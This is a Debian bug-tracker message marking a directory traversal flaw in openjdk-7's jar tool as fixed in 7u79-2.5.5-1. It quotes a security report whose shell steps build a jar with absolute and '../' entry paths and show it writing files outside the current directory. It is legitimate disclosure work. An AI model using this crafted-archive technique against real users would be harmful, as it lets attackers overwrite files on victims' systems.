Control: fixed -1 7u79-2.5.5-1 Hi,
On Fri, Jan 09, 2015 at 03:17:29PM +0300, Alexander Cherepanov wrote: > Package: openjdk-7-jdk > Version: 7u71-2.5.3-2 > Tags: security > > jar(1) is susceptible to a directory traversal vulnerability. While > extracting an archive, it will happily use absolute and relative paths taken > from the archive. This can be exploited by a malicious archive to write > files outside the current directory. > > For example, let's create a sample archive: > > $ mkdir Xtmp/ XX/ > $ touch Xtmp/abs XX/rel > $ jar -cMvf test.jar Xtmp/abs XX/rel > $ sed -i 's|Xtmp/|/tmp/|g;s|XX/|../|g' test.jar > $ rm -r Xtmp/ XX/ > > and then test it: > > $ ls /tmp/abs ../rel > ls: cannot access /tmp/abs: No such file or directory > ls: cannot access ../rel: No such file or directory > > $ jar -xvf test.jar > extracted: /tmp/abs > extracted: ../rel > > $ ls /tmp/abs ../rel > ../rel /tmp/abs > > My `jar` points to /etc/alternatives/jar, which points to > /usr/lib/jvm/java-7-openjdk-amd64/bin/jar . > > Not sure if this is just CVE-2005-1080 not fixed or something else. But > please note that CVE-2005-1080 talks about .. only. This should be fixed with 7u79-2.5.5-1. Regards, Salvatore -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
